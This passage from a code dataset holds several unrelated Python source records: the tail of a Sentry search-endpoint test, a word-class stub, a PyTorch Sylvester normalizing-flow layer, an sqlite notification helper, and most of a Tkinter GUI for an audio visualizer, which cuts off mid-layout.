organization=self.organization,\n owner=self.user,\n name='My Pinned Query',\n query='pinned junk',\n date_added=timezone.now().replace(microsecond=0)\n )\n included.append(pinned_query)\n self.check_results(included)\n # Check a pinned query that uses an existing query correctly filters\n # the existing query\n to_be_pinned = included.pop()\n to_be_pinned.is_pinned = True\n pinned_query.query = to_be_pinned.query\n pinned_query.save()\n included[0] = to_be_pinned\n self.check_results(included)\n","sub_path":"tests/sentry/api/endpoints/test_organization_searches.py","file_name":"test_organization_searches.py","file_ext":"py","file_size_in_byte":4988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"24579028","text":"\n\nfrom xai.brain.wordbase.nouns._madman import _MADMAN\n\n#calss header\nclass _MADMEN(_MADMAN, ):\n\tdef __init__(self,): \n\t\t_MADMAN.__init__(self)\n\t\tself.name = \"MADMEN\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"madman\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_madmen.py","file_name":"_madmen.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"169625865","text":"#!/usr/bin/env python3\n\nimport torch.nn as nn\nimport torch\nimport torch.nn.functional as F\nimport numpy as np\n\nclass Sylvester(nn.Module):\n \"\"\"\n Sylvester normalizing flow.\n \"\"\"\n\n def __init__(self, num_ortho_vecs):\n\n super(Sylvester, self).__init__()\n\n self.num_ortho_vecs = num_ortho_vecs\n\n self.h = nn.Tanh()\n\n triu_mask = torch.triu(torch.ones(num_ortho_vecs, num_ortho_vecs), diagonal=1).unsqueeze(0)\n diag_idx = torch.arange(0, num_ortho_vecs).long()\n\n self.register_buffer('triu_mask', torch.Tensor(triu_mask))\n self.triu_mask.requires_grad = False\n self.register_buffer('diag_idx', diag_idx)\n\n def der_h(self, x):\n return self.der_tanh(x)\n\n def der_tanh(self, x):\n return 1 - self.h(x) ** 2\n\n def _forward(self, zk, r1, r2, q_ortho, b, sum_ldj=True):\n \"\"\"\n All flow parameters are amortized. Conditions on diagonals of R1 and R2 for invertibility need to be satisfied\n outside of this function. Computes the following transformation:\n z' = z + QR1 h( R2Q^T z + b)\n or actually\n z'^T = z^T + h(z^T Q R2^T + b^T)R1^T Q^T\n :param zk: shape: (batch_size, z_size)\n :param r1: shape: (batch_size, num_ortho_vecs, num_ortho_vecs)\n :param r2: shape: (batch_size, num_ortho_vecs, num_ortho_vecs)\n :param q_ortho: shape (batch_size, z_size , num_ortho_vecs)\n :param b: shape: (batch_size, 1, self.z_size)\n :return: z, log_det_j\n \"\"\"\n\n # Amortized flow parameters\n zk = zk.unsqueeze(1)\n\n # Save diagonals for log_det_j\n diag_r1 = r1[:, self.diag_idx, self.diag_idx]\n diag_r2 = r2[:, self.diag_idx, self.diag_idx]\n\n r1_hat = r1\n r2_hat = r2\n\n qr2 = torch.bmm(q_ortho, r2_hat.transpose(2, 1))\n qr1 = torch.bmm(q_ortho, r1_hat)\n\n r2qzb = torch.bmm(zk, qr2) + b\n z = torch.bmm(self.h(r2qzb), qr1.transpose(2, 1)) + zk\n z = z.squeeze(1)\n\n # Compute log|det J|\n # Output log_det_j in shape (batch_size) instead of (batch_size,1)\n diag_j = diag_r1 * diag_r2\n diag_j = self.der_h(r2qzb).squeeze(1) * diag_j\n diag_j += 1.\n log_diag_j = diag_j.abs().log()\n\n if sum_ldj:\n log_det_j = log_diag_j.sum(-1)\n else:\n log_det_j = log_diag_j\n\n return z, log_det_j\n\n def forward(self, zk, r1, r2, q_ortho, b, sum_ldj=True):\n\n return self._forward(zk, r1, r2, q_ortho, b, sum_ldj)\n\n","sub_path":"lib_snf/flow.py","file_name":"flow.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"109244824","text":"import sqlite3\n\n\nclass DbConnect():\n def __init__(self):\n self.conn = sqlite3.connect('db.sqlite3')\n\n def insertNotifications(self,username,stock,action):\n cur = self.conn.cursor()\n cur.execute(\n 'INSERT INTO myapp_notificationType (username,stock, notificationType) values (?, ?, ?)',\n (username, stock, action))\n self.conn.commit()\n self.conn.close()","sub_path":"myapp/database_connections/db_connections.py","file_name":"db_connections.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"523163995","text":"from FanBlender import FanBlender, __version__\nfrom FanTkImageViewer import ImageViewer\nfrom LanguagePack import *\n\nimport threading, os, pickle, ctypes\nimport tkinter as tk\nfrom tkinter import ttk\nimport tkinter.messagebox\nfrom tkinter.filedialog import askopenfilename\nfrom tkinter.filedialog import askdirectory\nfrom tkinter import scrolledtext\n\n\"\"\"\nAudio Visualizer - GUI\nBy Twitter @FanKetchup\nhttps://github.com/FerryYoungFan/FanselineVisualizer\n\"\"\"\n\n# GUI Language\nlang = lang_en\nlang_code = \"en\"\n\n\n# lang = lang_cn_s\n\ndef clog(content=\"\", insertloc='end'):\n global scr\n scr.configure(state='normal')\n scr.insert(insertloc, content)\n scr.configure(state='disable')\n scr.see(\"end\")\n\n\ndef clearLog():\n global scr\n scr.configure(state='normal')\n scr.delete('1.0', tk.END)\n clog(\"*\" * 35 + \" \" + lang[\"Welcome to use\"] + \" \" + lang[\"Fanseline Audio Visualizer\"] + \"!\" \\\n + \" \" + \"*\" * 35 + \"\\n\\n\")\n clog(lang[\"Project Website: \"] + \"https://github.com/FerryYoungFan/FanselineVisualizer\" + \"\\n\\n\")\n\n\nclass InfoBridge:\n def __init__(self):\n pass\n\n def log(self, content=\"\"):\n clog(content + \"\\n\")\n\n def progressbar(self, value, total):\n global progress\n progress[\"value\"] = (100 * value / total)\n\n def freeze(self, flag=True):\n global isRunning\n if flag:\n fg = \"disabled\"\n self.progressbar(0, 100)\n btn_blend[\"text\"] = lang[\"Stop Blending\"]\n isRunning = True\n root.title(lang[\"Fanseline Audio Visualizer\"] + \" -V.\" + __version__ + \" \" + lang[\"(Running)\"])\n else:\n fg = \"normal\"\n self.progressbar(0, 100)\n btn_blend[\"text\"] = lang[\"Blend & Export\"]\n isRunning = False\n root.title(lang[\"Fanseline Audio Visualizer\"] + \" -V.\" + __version__)\n elem = [entry_audio, btn_audio, entry_fname, btn_output, entry_img, btn_img, entry_logo, btn_logo,\n entry_text, entry_font, btn_font, entry_width, entry_height, entry_fps, entry_brv, btn_autob,\n entry_low, entry_up, entry_bins, entry_scalar, list_color, list_bra, check_normal, list_preseta,\n list_presetv, entry_output, label_mp4, label_textplz, label_font, label_size, label_mul,\n label_fps, label_brv, label_range, label_to, label_hz, label_bins, label_scalar, label_color,\n label_bra, label_kbps, label_preseta, label_presetv, list_lang, label_lang, label_smooth, list_smooth,\n entry_bg, btn_bg, entry_relsize, check_use_glow, label_bright, entry_bright, label_bg_mode,\n list_bg_mode, label_style, list_style, label_linewidth, entry_linewidth, entry_rotate, label_rotate,\n label_saturation, entry_saturation, label_text_brt, entry_text_brt]\n for el in elem:\n el[\"state\"] = fg\n\n if not flag:\n list_color[\"state\"] = \"readonly\"\n list_preseta[\"state\"] = \"readonly\"\n list_presetv[\"state\"] = \"readonly\"\n list_lang[\"state\"] = \"readonly\"\n list_bg_mode[\"state\"] = \"readonly\"\n list_style[\"state\"] = \"readonly\"\n root_view.withdraw()\n\n def realTime(self, img):\n global frame2\n if frame2.winfo_viewable():\n frame2.imshow(img)\n\n\nimg_format_dict = \"*.jpg *.jpeg *.png *.gif *.bmp *.ico *.dib *.webp *.tiff *.tga\"\n\n\ndef selectImage():\n try:\n global tk_image_path\n pathread = askopenfilename(\n filetypes=[(lang[\"Image files\"], img_format_dict), (lang[\"All files\"], \"*.*\")])\n if not pathread or not os.path.exists(pathread):\n return\n else:\n tk_image_path.set(pathread)\n entry_img.xview(\"end\")\n clog(lang[\"Foreground Selected: \"])\n clog(pathread + '\\n')\n fastPreview()\n 
except:\n return\n\n\ndef selectLogo():\n try:\n global tk_logo_path\n pathread = askopenfilename(\n filetypes=[(lang[\"Image files\"], img_format_dict), (lang[\"All files\"], \"*.*\")])\n if not pathread or not os.path.exists(pathread):\n return\n else:\n tk_logo_path.set(pathread)\n entry_logo.xview(\"end\")\n clog(lang[\"Logo Selected: \"])\n clog(pathread + '\\n')\n fastPreview()\n except:\n return\n\n\ndef selectBG():\n try:\n global tk_bg_path\n pathread = askopenfilename(\n filetypes=[(lang[\"Image files\"], img_format_dict), (lang[\"All files\"], \"*.*\")])\n if not pathread or not os.path.exists(pathread):\n return\n else:\n tk_bg_path.set(pathread)\n entry_bg.xview(\"end\")\n clog(lang[\"Background Selected: \"])\n clog(pathread + '\\n')\n fastPreview()\n except:\n return\n\n\ndef selectAudio():\n try:\n global tk_sound_path, tk_output_path, tk_filename\n pathread = askopenfilename(\n filetypes=[(lang[\"Audio files\"], \"*.mp3 *.wav *.ogg *.aac *.flac *.ape *.m4a *.m4r *.wma *.mp2 *.mmf\"),\n (lang[\"Video files\"], \"*.mp4 *.wmv *.avi *.flv *.mov *.mkv *.rm *.rmvb\"),\n (lang[\"All files\"], \"*.*\")])\n if not pathread or not os.path.exists(pathread):\n return\n else:\n tk_sound_path.set(pathread)\n entry_audio.xview(\"end\")\n vdic = getAllValues()\n if vdic[\"output_path\"] is None:\n tk_output_path.set(os.path.dirname(os.path.realpath(pathread)).replace(\"\\\\\", \"/\") + \"/\")\n entry_output.xview(\"end\")\n new_name = (os.path.splitext(pathread)[0].split(\"/\")[-1]) + lang[\"_Visualize\"]\n tk_filename.set(new_name)\n entry_fname.xview(\"end\")\n clog(lang[\"Audio Selected: \"])\n clog(tk_sound_path.get() + '\\n')\n except:\n return\n\n\ndef selectOutput():\n try:\n global tk_output_path\n pathexport = askdirectory()\n pathexport = pathexport + '/'\n if not pathexport or pathexport == \"/\":\n return\n else:\n tk_output_path.set(pathexport)\n entry_output.xview(\"end\")\n clog(lang[\"Output Path Selected: \"])\n clog(tk_output_path.get() + '\\n')\n except:\n return\n\n\ndef selectFont():\n global tk_font, tk_text\n try:\n pathread = askopenfilename(filetypes=[(lang[\"Font files\"], \"*.ttf *.otf\"), (lang[\"All files\"], \"*.*\")])\n if not pathread:\n return\n else:\n tk_font.set(pathread)\n entry_font.xview(\"end\")\n clog(lang[\"Font Selected: \"])\n clog(pathread + '\\n')\n fastPreview()\n except:\n return\n\n\ndef getAllValues():\n global tk_image_path, tk_sound_path, tk_logo_path, tk_output_path, tk_filename, \\\n tk_text, tk_font, tk_bins, tk_fq_low, tk_fq_high, color_dic, list_color, tk_scalar, \\\n tk_width, tk_height, tk_fps, tk_br_video, tk_br_audio, tk_audio_normal, tk_smooth, \\\n tk_bg_path, tk_bright, tk_blur_bg, tk_use_glow, tk_relsize, tk_bg_mode, bg_mode_dic, \\\n tk_style, tk_linewidth, style_dic, tk_rotate, tk_saturation, tk_text_brt\n\n def checkStr(strtk):\n if strtk.get():\n return strtk.get()\n else:\n return None\n\n def checkFile(strtk):\n path = checkStr(strtk)\n if path is not None:\n if os.path.exists(path):\n return path\n return None\n\n def checkInt(inttk):\n\n try:\n num = float(inttk.get())\n except:\n return None\n else:\n return int(round(num))\n\n def checkFloat(floattk):\n try:\n num = float(floattk.get())\n except:\n return None\n else:\n return num\n\n if checkStr(tk_filename) is not None:\n fname = checkStr(tk_filename) + \".mp4\"\n else:\n fname = None\n\n param_dict = {\n \"image_path\": checkFile(tk_image_path),\n \"bg_path\": checkFile(tk_bg_path),\n \"sound_path\": checkFile(tk_sound_path),\n \"logo_path\": 
checkFile(tk_logo_path),\n \"output_path\": checkStr(tk_output_path),\n \"filename\": fname,\n \"text\": checkStr(tk_text),\n \"font\": checkStr(tk_font),\n \"text_brt\": checkFloat(tk_text_brt),\n\n \"bins\": checkInt(tk_bins),\n \"lower\": checkInt(tk_fq_low),\n \"upper\": checkInt(tk_fq_high),\n \"color\": color_dic[checkStr(list_color)],\n \"scalar\": checkFloat(tk_scalar),\n \"smooth\": checkInt(tk_smooth),\n \"bright\": checkFloat(tk_bright),\n \"saturation\": checkFloat(tk_saturation),\n\n \"blur_bg\": bg_mode_dic[checkStr(tk_bg_mode)][0],\n \"bg_mode\": bg_mode_dic[checkStr(tk_bg_mode)][1],\n \"use_glow\": tk_use_glow.get(),\n \"relsize\": checkFloat(tk_relsize),\n\n \"width\": checkInt(tk_width),\n \"height\": checkInt(tk_height),\n \"fps\": checkFloat(tk_fps),\n \"br_Mbps\": checkFloat(tk_br_video),\n\n \"normal\": tk_audio_normal.get(),\n \"br_kbps\": checkInt(tk_br_audio),\n\n \"style\": style_dic[checkStr(tk_style)],\n \"linewidth\": checkFloat(tk_linewidth),\n \"rotate\": checkFloat(tk_rotate),\n\n }\n return param_dict\n\n\ndef dict2tuple(dict_input):\n keys = []\n for key in dict_input.keys():\n keys.append(key)\n return tuple(keys)\n\n\ndef autoBitrate():\n vdic = getAllValues()\n global tk_br_video\n if vdic[\"width\"] is not None and vdic[\"height\"] is not None and vdic[\"fps\"] is not None:\n brv = getDefaultBR(vdic[\"width\"], vdic[\"height\"], vdic[\"fps\"], 4)\n tk_br_video.set(round(brv * 100) / 100)\n\n\ndef setBlender(param_dict):\n global fb\n fb.setConsole(InfoBridge())\n fb.setFilePath(image_path=param_dict[\"image_path\"],\n bg_path=param_dict[\"bg_path\"],\n sound_path=param_dict[\"sound_path\"],\n logo_path=param_dict[\"logo_path\"])\n fb.setOutputPath(output_path=param_dict[\"output_path\"],\n filename=param_dict[\"filename\"])\n fb.setText(text=param_dict[\"text\"], font=param_dict[\"font\"],\n relsize=param_dict[\"relsize\"], text_brt=param_dict[\"text_brt\"])\n fb.setSpec(bins=param_dict[\"bins\"], lower=param_dict[\"lower\"], upper=param_dict[\"upper\"],\n color=param_dict[\"color\"], bright=param_dict[\"bright\"], saturation=param_dict[\"saturation\"],\n scalar=param_dict[\"scalar\"], smooth=param_dict[\"smooth\"],\n style=param_dict[\"style\"], linewidth=param_dict[\"linewidth\"])\n fb.setVideoInfo(width=param_dict[\"width\"], height=param_dict[\"height\"],\n fps=param_dict[\"fps\"], br_Mbps=param_dict[\"br_Mbps\"],\n blur_bg=param_dict[\"blur_bg\"], use_glow=param_dict[\"use_glow\"],\n bg_mode=param_dict[\"bg_mode\"], rotate=param_dict[\"rotate\"])\n fb.setAudioInfo(normal=param_dict[\"normal\"], br_kbps=param_dict[\"br_kbps\"])\n\n\ndef getDefaultBR(width, height, fps, quality=3):\n if quality == 5:\n return 20 * (width * height * fps) / (1920 * 1080 * 30)\n elif quality == 4:\n return 12 * (width * height * fps) / (1920 * 1080 * 30)\n elif quality == 3:\n return 7 * (width * height * fps) / (1920 * 1080 * 30)\n elif quality == 2:\n return 2 * (width * height * fps) / (1920 * 1080 * 30)\n elif quality == 1:\n return (width * height * fps) / (1920 * 1080 * 30)\n elif quality == 0:\n return 0.5 * (width * height * fps) / (1920 * 1080 * 30)\n else:\n return 12 * (width * height * fps) / (1920 * 1080 * 30)\n\n\ndef showPreview():\n global fb\n if not isRunning:\n saveConfig()\n setBlender(getAllValues())\n\n def _showPreview():\n global frame2, root_view\n frame2.imshow(fb.previewBackground())\n if not frame2.winfo_viewable():\n root_view.deiconify()\n\n th_preview = threading.Thread(target=_showPreview)\n th_preview.setDaemon(True)\n 
th_preview.start()\n else:\n global root_view\n if not root_view.winfo_viewable():\n root_view.deiconify()\n\n\ndef startBlending():\n global fb\n vdic = getAllValues()\n if vdic[\"sound_path\"] is None:\n tkinter.messagebox.showinfo(lang[\"Cannot Blend\"], lang[\"Please select the correct audio file!\"])\n return\n if vdic[\"output_path\"] is None:\n tkinter.messagebox.showinfo(lang[\"Cannot Blend\"], lang[\"Please select the correct output path!\"])\n return\n if vdic[\"filename\"] is None:\n tkinter.messagebox.showinfo(lang[\"Cannot Blend\"], lang[\"Please input the corrent file name!\"])\n return\n\n if not isRunning:\n setBlender(vdic)\n if os.path.exists(fb.getOutputPath()):\n MsgBox = tk.messagebox.askquestion(lang[\"Notice\"], lang[\"Are you sure to overwrite this file?\"])\n if MsgBox == 'yes':\n pass\n else:\n return\n showPreview()\n clearLog()\n saveConfig()\n th_blend = threading.Thread(target=fb.runBlending)\n th_blend.setDaemon(True)\n th_blend.start()\n else:\n MsgBox = tk.messagebox.askquestion(lang[\"Notice\"], lang[\"Are you sure to stop blending?\"])\n if MsgBox == 'yes':\n pass\n else:\n return\n clog(lang[\"Stop Blending...\"] + \"\\n\")\n fb.isRunning = False\n\n\ndef presetVideo(*args):\n global video_dic, list_presetv, tk_width, tk_height, tk_fps, tk_br_video\n w, h, fps, brv = video_dic[list_presetv.get()]\n tk_width.set(w)\n tk_height.set(h)\n tk_fps.set(fps)\n tk_br_video.set(round(brv * 100) / 100)\n fastPreview()\n\n\ndef presetAudio(*args):\n global audio_dic, tk_br_audio, tk_fq_low, tk_fq_high, tk_audio_normal, tk_scalar, tk_smooth\n bra, low, up, normal, scale, smooth = audio_dic[list_preseta.get()]\n tk_br_audio.set(bra)\n tk_fq_low.set(low)\n tk_fq_high.set(up)\n tk_audio_normal.set(normal)\n tk_scalar.set(scale)\n tk_smooth.set(smooth)\n\n\ndef saveConfig():\n vdic = getAllValues()\n try:\n directory = os.path.dirname(\"./Source/\")\n if not os.path.exists(directory):\n os.makedirs(directory)\n with open('./Source/config.pickle', 'wb') as handle:\n pickle.dump(vdic, handle, protocol=pickle.HIGHEST_PROTOCOL)\n except:\n clog(lang[\"Error! 
Cannot save config!\"])\n\n\ndef loadConfig():\n try:\n with open('./Source/config.pickle', 'rb') as handle:\n vdic = pickle.load(handle)\n except:\n print(\"No config\")\n saveConfig()\n return\n\n global tk_image_path, tk_sound_path, tk_logo_path, tk_output_path, tk_filename, \\\n tk_text, tk_font, tk_bins, tk_fq_low, tk_fq_high, color_dic, list_color, tk_scalar, \\\n tk_width, tk_height, tk_fps, tk_br_video, tk_br_audio, tk_audio_normal, tk_smooth, \\\n tk_bg_path, tk_bright, tk_blur_bg, tk_use_glow, tk_relsize, tk_bg_mode, label_mp4, \\\n style_dic, tk_saturation, tk_text_brt\n\n def fileCheck(dicv, tk_value):\n try:\n path = vdic[dicv]\n if path is not None and os.path.exists(path):\n tk_value.set(path)\n else:\n tk_value.set(\"\")\n except:\n pass\n\n def strCheck(dicv, tk_value, trunc=False):\n try:\n strv = vdic[dicv]\n if strv is not None:\n if not trunc:\n tk_value.set(strv)\n else:\n tk_value.set(\"\".join(strv.split(\".\")[:-1]))\n else:\n tk_value.set(\"\")\n except:\n pass\n\n def numCheck(dicv, tk_value):\n try:\n num = vdic[dicv]\n if num is not None:\n tk_value.set(num)\n else:\n tk_value.set(0)\n except:\n pass\n\n fileCheck(\"image_path\", tk_image_path)\n fileCheck(\"sound_path\", tk_sound_path)\n fileCheck(\"bg_path\", tk_bg_path)\n fileCheck(\"logo_path\", tk_logo_path)\n fileCheck(\"output_path\", tk_output_path)\n strCheck(\"filename\", tk_filename, True)\n strCheck(\"text\", tk_text)\n fileCheck(\"font\", tk_font)\n numCheck(\"bins\", tk_bins)\n numCheck(\"lower\", tk_fq_low)\n numCheck(\"upper\", tk_fq_high)\n numCheck(\"scalar\", tk_scalar)\n numCheck(\"width\", tk_width)\n numCheck(\"height\", tk_height)\n numCheck(\"fps\", tk_fps)\n numCheck(\"br_Mbps\", tk_br_video)\n numCheck(\"br_kbps\", tk_br_audio)\n numCheck(\"normal\", tk_audio_normal)\n numCheck(\"bright\", tk_bright)\n numCheck(\"saturation\", tk_saturation)\n numCheck(\"blur_bg\", tk_blur_bg)\n numCheck(\"use_glow\", tk_use_glow)\n numCheck(\"smooth\", tk_smooth)\n numCheck(\"relsize\", tk_relsize)\n numCheck(\"text_brt\", tk_text_brt)\n numCheck(\"linewidth\", tk_linewidth)\n numCheck(\"rotate\", tk_rotate)\n\n try:\n if vdic[\"color\"] is not None:\n color_prev = None\n for cname, ccode in color_dic.items():\n if ccode == vdic[\"color\"]:\n color_prev = cname\n break\n if color_prev is not None:\n tk_color.set(color_prev)\n except:\n pass\n\n try:\n if vdic[\"blur_bg\"] is not None and vdic[\"bg_mode\"] is not None:\n if vdic[\"bg_mode\"] >= 0:\n label_mp4[\"text\"] = \".mp4\"\n else:\n label_mp4[\"text\"] = \".mov\"\n for bname, values in bg_mode_dic.items():\n if values == [vdic[\"blur_bg\"], vdic[\"bg_mode\"]]:\n tk_bg_mode.set(bname)\n except:\n pass\n\n try:\n if vdic[\"style\"] is not None:\n for sname, scode in style_dic.items():\n if scode == vdic[\"style\"]:\n tk_style.set(sname)\n break\n except:\n pass\n\n entry_img.xview(\"end\")\n entry_logo.xview(\"end\")\n entry_bg.xview(\"end\")\n entry_fname.xview(\"end\")\n entry_audio.xview(\"end\")\n entry_output.xview(\"end\")\n entry_font.xview(\"end\")\n\n\ndef saveLanguage():\n global lang, lang_code\n with open('./Source/language.pickle', 'wb') as handle:\n pickle.dump(lang_code, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n\ndef loadLanguage():\n global lang, lang_code\n lang_code = \"en\"\n try:\n with open('./Source/language.pickle', 'rb') as handle:\n lang_code = pickle.load(handle)\n except:\n print(\"No language config\")\n\n if lang_code == \"cn_s\":\n lang = lang_cn_s\n else:\n lang = lang_en\n\n\ndef resetGUI(*args):\n global 
lang_code, exit_flag, root, list_lang\n # lang_code = lc\n if list_lang.get() == \"简体中文\":\n lang_code = \"cn_s\"\n else:\n lang_code = \"en\"\n saveConfig()\n saveLanguage()\n exit_flag = False\n root.destroy()\n\n\ndef setFileType(*args):\n global label_mp4, bg_mode_dic, tk_bg_mode\n try:\n if bg_mode_dic[tk_bg_mode.get()][1] >= 0:\n label_mp4[\"text\"] = \".mp4\"\n else:\n label_mp4[\"text\"] = \".mov\"\n except:\n pass\n\n\ndef fastPreview(*args):\n global frame2, old_vdic\n if frame2 and frame2.winfo_viewable():\n vdic = getAllValues()\n if vdic != old_vdic:\n showPreview()\n\n\ndef shortCut(event):\n if event.keysym == \"F5\":\n startBlending()\n if event.keysym == \"F4\":\n showPreview()\n\n\ndef bindPreview(tk_obj):\n tk_obj.trace(\"w\", lambda name, index, mode=tk_obj: fastPreview())\n\n\nif __name__ == '__main__':\n exit_flag = False\n GUI_WIDTH = 950\n GUI_HEIGHT = 700\n while not exit_flag:\n exit_flag = True\n\n root = tk.Tk()\n loadLanguage()\n\n old_vdic = None\n tk_image_path = tk.StringVar(value=\"./Source/fallback.png\")\n tk_sound_path = tk.StringVar()\n tk_logo_path = tk.StringVar(value=\"./Source/Logo.png\")\n tk_bg_path = tk.StringVar(value=\"\")\n tk_output_path = tk.StringVar()\n tk_filename = tk.StringVar(value=\"output\")\n\n tk_text = tk.StringVar()\n tk_font = tk.StringVar(value=\"./Source/font.otf\")\n tk_relsize = tk.DoubleVar(value=1.0)\n bindPreview(tk_relsize)\n tk_text_brt = tk.DoubleVar(value=1.0)\n bindPreview(tk_text_brt)\n\n tk_bins = tk.IntVar(value=80)\n bindPreview(tk_bins)\n\n tk_fq_low = tk.IntVar()\n tk_fq_high = tk.IntVar()\n tk_scalar = tk.DoubleVar()\n tk_color = tk.StringVar()\n bindPreview(tk_color)\n tk_bright = tk.DoubleVar(value=0.8)\n bindPreview(tk_bright)\n tk_saturation = tk.DoubleVar(value=0.8)\n bindPreview(tk_saturation)\n tk_smooth = tk.IntVar()\n tk_linewidth = tk.DoubleVar(value=1.0)\n bindPreview(tk_linewidth)\n tk_style = tk.StringVar()\n bindPreview(tk_style)\n\n tk_bg_mode = tk.StringVar()\n bindPreview(tk_bg_mode)\n tk_blur_bg = tk.BooleanVar(value=True)\n bindPreview(tk_blur_bg)\n tk_use_glow = tk.BooleanVar(value=False)\n bindPreview(tk_use_glow)\n tk_rotate = tk.DoubleVar(value=0)\n\n tk_width = tk.IntVar()\n tk_height = tk.IntVar()\n tk_fps = tk.DoubleVar()\n tk_br_video = tk.DoubleVar()\n tk_br_audio = tk.IntVar()\n tk_audio_normal = tk.BooleanVar()\n\n tk_preseta = tk.StringVar()\n tk_presetv = tk.StringVar()\n\n tk_lang = tk.StringVar()\n\n isRunning = False\n\n fb = FanBlender()\n\n root.title(lang[\"Fanseline Audio Visualizer\"] + \" -V.\" + __version__)\n root.bind('', shortCut)\n canvas = tk.Canvas(root, width=GUI_WIDTH, height=GUI_HEIGHT)\n canvas.pack()\n frame1 = tk.Frame(master=root)\n frame1.place(relx=0, rely=0, relwidth=1, relheight=1, anchor='nw')\n\n root_view = tk.Toplevel(root)\n root_view.title(lang[\"Preview\"])\n root_view.withdraw()\n canvas = tk.Canvas(root_view, width=GUI_WIDTH // 2, height=GUI_HEIGHT // 2)\n canvas.pack()\n frame2 = ImageViewer(root_view)\n frame2.setGUI(GUI_WIDTH * 2 / 3, GUI_HEIGHT)\n frame2.setLanguage(lang)\n\n rely, devy = 0.01, 0.06\n relh = 0.04\n\n label_lang = tk.Label(master=frame1, textvariable=tk.StringVar(value=\"Language/语言:\"), anchor=\"e\")\n label_lang.place(relwidth=0.1, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n list_lang = ttk.Combobox(master=frame1, textvariable=tk_lang, state=\"readonly\")\n list_lang[\"values\"] = (\"English\", \"简体中文\")\n if lang_code == \"cn_s\":\n list_lang.current(1)\n else:\n list_lang.current(0)\n 
list_lang.place(relwidth=0.1, relheight=relh, relx=0.15, rely=rely, anchor='nw')\n list_lang.bind(\"<<ComboboxSelected>>\", resetGUI)\n\n label_preseta = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Audio Preset:\"]), anchor=\"e\")\n label_preseta.place(relwidth=0.1, relheight=relh, relx=0.25, rely=rely, anchor='nw')\n list_preseta = ttk.Combobox(master=frame1, textvariable=tk_preseta, state=\"readonly\")\n audio_dic = {\n lang[\"Music-HQ\"] + \" (320k)\": [320, 20, 2500, False, 1.0, 2],\n lang[\"Music-MQ\"] + \" (128k)\": [128, 20, 2500, False, 1.0, 2],\n lang[\"Music-LQ\"] + \" (48k)\": [48, 20, 2500, False, 1.0, 2],\n lang[\"Voice-HQ\"] + \" (320k)\": [320, 20, 2500, True, 1.0, 5],\n lang[\"Voice-MQ\"] + \" (128k)\": [128, 40, 2200, True, 1.0, 5],\n lang[\"Voice-LQ\"] + \" (48k)\": [48, 80, 2000, True, 1.0, 5],\n }\n list_preseta[\"values\"] = dict2tuple(audio_dic)\n list_preseta.current(0)\n list_preseta.bind(\"<<ComboboxSelected>>\", presetAudio)\n presetAudio()\n list_preseta.set(lang[\"-Please Select-\"])\n list_preseta.place(relwidth=0.14, relheight=relh, relx=0.35, rely=rely, anchor='nw')\n\n label_presetv = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Video Preset:\"]), anchor=\"e\")\n label_presetv.place(relwidth=0.1, relheight=relh, relx=0.5, rely=rely, anchor='nw')\n list_presetv = ttk.Combobox(master=frame1, textvariable=tk_presetv, state=\"readonly\")\n video_dic = {\n lang[\"Square\"] + \" (1080x1080)\": [1080, 1080, 30, getDefaultBR(1080, 1080, 30, 5)],\n lang[\"Square\"] + \" (1024x1024)\": [1024, 1024, 30, getDefaultBR(1024, 1024, 30, 5)],\n lang[\"Square\"] + \" (720x720)\": [720, 720, 30, getDefaultBR(720, 720, 30, 4)],\n lang[\"Square\"] + \" (512x512)\": [512, 512, 30, getDefaultBR(512, 512, 30, 4)],\n lang[\"Square\"] + \" (480x480)\": [480, 480, 30, getDefaultBR(480, 480, 30, 4)],\n lang[\"Landscape\"] + \" (1920x1080)\": [1920, 1080, 30, getDefaultBR(1920, 1080, 30, 5)],\n lang[\"Landscape\"] + \" (1280x720)\": [1280, 720, 30, getDefaultBR(1280, 720, 30, 4)],\n lang[\"Landscape\"] + \" (854x480)\": [854, 480, 30, getDefaultBR(854, 480, 30, 4)],\n lang[\"Portrait\"] + \" (1080x1920)\": [1080, 1920, 30, getDefaultBR(1920, 1080, 30, 5)],\n lang[\"Portrait\"] + \" (720x1280)\": [720, 1280, 30, getDefaultBR(1280, 720, 30, 4)],\n lang[\"Portrait\"] + \" (480x854)\": [480, 854, 30, getDefaultBR(854, 480, 30, 4)],\n \"2k (2560x1440)\": [2560, 1440, 30, getDefaultBR(2560, 1440, 30, 5)],\n }\n list_presetv[\"values\"] = dict2tuple(video_dic)\n list_presetv.current(4)\n list_presetv.bind(\"<<ComboboxSelected>>\", presetVideo)\n presetVideo()\n list_presetv.set(lang[\"-Please Select-\"])\n list_presetv.place(relwidth=0.19, relheight=relh, relx=0.6, rely=rely, anchor='nw')\n\n btn_prev = tk.Button(master=frame1, text=lang[\"Preview\"], command=showPreview)\n btn_prev.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n entry_audio = tk.Entry(master=frame1, textvariable=tk_sound_path)\n entry_audio.place(relwidth=0.74, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n btn_audio = tk.Button(master=frame1, text=lang[\"Audio (REQUIRED)\"], command=selectAudio)\n btn_audio.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n entry_img = tk.Entry(master=frame1, textvariable=tk_image_path)\n entry_img.place(relwidth=0.74, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n btn_img = tk.Button(master=frame1, text=lang[\"Foreground Image\"], command=selectImage)\n btn_img.place(relwidth=0.15, relheight=relh, relx=0.8, 
